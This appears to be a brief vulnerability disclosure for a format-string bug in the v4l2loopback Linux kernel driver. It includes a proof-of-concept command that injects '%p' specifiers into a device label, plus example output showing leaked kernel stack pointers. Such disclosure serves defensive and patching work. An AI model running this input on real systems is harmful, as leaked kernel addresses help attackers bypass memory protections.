Description

When adding a new video device with v4l2loopback-ctl that contains a card label with format string modifiers the kernel driver interprets these when querying the device capabilities, thus leaking kernel memory (stack contents).

The vulnerability requires the attacker to have access to the /dev/v4l2loopback, which is owned by root:root with chmod 600 by default. This attack can still be used successfully against kernels in lock down mode.

Proof of Concept

v4l2loopback-ctl add -n "%p-%p-%p"
cat /sys/devices/virtual/video4linux/video2/name 

Output (example):

/dev/video2
00000000de899e9f-00000000f6d35a 

Expected:

/dev/video2
%p-%p-%p